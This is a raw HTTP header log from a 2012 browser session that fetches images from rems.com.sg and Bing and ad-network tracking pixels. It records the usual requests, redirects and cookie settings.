Last-Modified: Thu, 19 Jul 2012 08:40:44 GMT
Etag: &quot;2974cde-ce-4c52abc3d5c6a&quot;
Accept-Ranges: bytes
Content-Length: 206
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
GET /images/slideshow_nav1.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/slider.css
Cookie: __utma=240077056.1854703103.1352380491.1352380491.1352380491.1; __utmb=240077056.1.10.1352380491; __utmc=240077056; __utmz=240077056.1352380491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:11 GMT
Etag: &quot;b6d6c3-b38-4c52aba41cdb5&quot;
Accept-Ranges: bytes
Content-Length: 2872
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /c.gif?DI=15074 HTTP/1.1

Host: c.bing.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813589; MUID=0342B58B415E68A91BF9B1994059688F; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#
HTTP/1.1 302 Redirect

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.atdmt.com/c.gif?DI=15074&amp;RedC=c.bing.com&amp;MXFR=0342B58B415E68A91BF9B1994059688F
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP=&quot;BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo&quot;
Set-Cookie: MUID=0342B58B415E68A91BF9B1994059688F&amp;TUID=1; domain=.bing.com; expires=Sat, 08-Nov-2014 13:14:53 GMT; path=/;
Date: Thu, 08 Nov 2012 13:14:53 GMT
Content-Length: 0
GET /img/loading.gif HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
Cookie: __utma=240077056.1854703103.1352380491.1352380491.1352380491.1; __utmb=240077056.1.10.1352380491; __utmc=240077056; __utmz=240077056.1352380491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Content-Length: 393
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
GET /images/favicon.ico HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: __utma=240077056.1854703103.1352380491.1352380491.1352380491.1; __utmb=240077056.1.10.1352380491; __utmc=240077056; __utmz=240077056.1352380491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=iso-8859-1
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Content-Length: 396
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /images/applepc.png?1352380491602 HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/
Cookie: __utma=240077056.1854703103.1352380491.1352380491.1352380491.1; __utmb=240077056.1.10.1352380491; __utmc=240077056; __utmz=240077056.1352380491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:53 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:39:22 GMT
Etag: &quot;11516d4-e7d1-4c52ab75f0854&quot;
Accept-Ranges: bytes
Content-Length: 59345
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=0342B58B415E68A91BF9B1994059688F HTTP/1.1

Host: c.atdmt.com
GET /c.gif?DI=15074&amp;RedC=c.bing.com&amp;MXFR=0342B58B415E68A91BF9B1994059688F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: AA002=1350344862-22301988; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA
HTTP/1.1 302 Redirect

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&amp;MUID=28A467A70F8D6B9C1F16645D0C8D6BFA&amp;cb=1cdbdb3ac6d190
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP=&quot;BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo&quot;
Set-Cookie: MUID=28A467A70F8D6B9C1F16645D0C8D6BFA; domain=.atdmt.com; expires=Sat, 08-Nov-2014 13:14:54 GMT; path=/; SRM_A=28A467A70F8D6B9C1F16645D0C8D6BFA; domain=c.atdmt.com; expires=Sat, 08-Nov-2014 13:14:54 GMT; path=/; SRM_B=28A467A70F8D6B9C1F16645D0C8D6BFA; domain=c.atdmt.com; expires=Sat, 08-Nov-2014 13:14:54 GMT; path=/;
Date: Thu, 08 Nov 2012 13:14:53 GMT
Content-Length: 0
GET /c.gif?DI=15074&MUID=28A467A70F8D6B9C1F16645D0C8D6BFA&cb=1cdbdb3ac6d190 HTTP/1.1

Host: c.bing.com
GET /c.gif?DI=15074&amp;MUID=28A467A70F8D6B9C1F16645D0C8D6BFA&amp;cb=1cdbdb3ac6d190 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813589; MUID=0342B58B415E68A91BF9B1994059688F&amp;TUID=1; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#; RMS=F=GAAAAAAAAABB
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Last-Modified: Thu, 20 Oct 2011 10:27:58 GMT
Accept-Ranges: bytes
Etag: &quot;04baaef128fcc1:0&quot;
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP=&quot;BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo&quot;
Set-Cookie: MUID=28A467A70F8D6B9C1F16645D0C8D6BFA; domain=.bing.com; expires=Sat, 08-Nov-2014 13:14:54 GMT; path=/; ANONCHK=0; domain=c.bing.com; expires=Sun, 11-Nov-2012 13:14:54 GMT; path=/;
Date: Thu, 08 Nov 2012 13:14:54 GMT
Content-Length: 42
GET /fd/ls/GLinkPing.aspx?CM=TMF&IG=937ccaa1fdf84836ad798eda1af35d11&CID=0342B58B415E68A91BF9B1994059688F HTTP/1.1

Host: www.bing.com
GET /fd/ls/GLinkPing.aspx?CM=TMF&amp;IG=937ccaa1fdf84836ad798eda1af35d11&amp;CID=0342B58B415E68A91BF9B1994059688F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
Cookie: _HOP=; _FP=EM=1; _FS=NU=1; _SS=SID=85769599907F41F5B6CE773F1C26F54D&amp;bIm=813589; MUID=28A467A70F8D6B9C1F16645D0C8D6BFA; OrigMUID=0342B58B415E68A91BF9B1994059688F%2c937ccaa1fdf84836ad798eda1af35d11; SRCHD=MS=2553914&amp;D=2553914&amp;AF=NOFORM; SRCHUID=V=2&amp;GUID=56C6A3E957784946BDF6EC2DA3C1708A; SRCHUSR=AUTOREDIR=0&amp;GEOVAR=&amp;DOB=20121108; SCRHDN=ASD=0&amp;DURL=#; RMS=F=GAAAAAAAAABB
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-cache
Pragma: no-cache
Expires: Sun, 12 Oct 2003 00:00:00 GMT
P3P: CP=&quot;NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND&quot;
Content-Length: 42
Date: Thu, 08 Nov 2012 13:14:54 GMT
Connection: keep-alive
Set-Cookie: OrigMUID=; expires=Thu, 01-Jan-1970 00:00:00 GMT; domain=.bing.com; path=/ _FS=NU=1; domain=.bing.com; path=/ SRCHD=SM=1&amp;MS=2553914&amp;D=2553914&amp;AF=NOFORM; expires=Sat, 08-Nov-2014 13:14:54 GMT; domain=.bing.com; path=/
GET /images/slide-seemore-details.png HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://rems.com.sg/css/slider.css
Cookie: __utma=240077056.1854703103.1352380491.1352380491.1352380491.1; __utmb=240077056.1.10.1352380491; __utmc=240077056; __utmz=240077056.1352380491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
HTTP/1.1 200 OK

Content-Type: image/png
Date: Thu, 08 Nov 2012 13:14:54 GMT
Server: Apache
Last-Modified: Thu, 19 Jul 2012 08:40:06 GMT
Etag: &quot;b6d6bf-3ea-4c52ab9fb9a7c&quot;
Accept-Ranges: bytes
Content-Length: 1002
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
GET /pix?cid=1237&uid=28A467A70F8D6B9C1F16645D0C8D6BFA HTTP/1.1

Host: cms.abmr.net
GET /pix?cid=1237&amp;uid=28A467A70F8D6B9C1F16645D0C8D6BFA HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.bing.com/
HTTP/1.1 200 OK

Content-Type: text/html
Content-Length: 0
Expires: Thu, 08 Nov 2012 13:14:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 08 Nov 2012 13:14:54 GMT
Connection: keep-alive
Set-Cookie: 01AI=3a59AbkdvBwS9b5to2B75HwhytRL4lIvoPrPFquuoyCIy137KRt4MNg; expires=Fri, 08-Nov-2013 13:14:54 GMT; path=/; domain=.abmr.net
GET /images/favicon.ico HTTP/1.1

Host: rems.com.sg

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive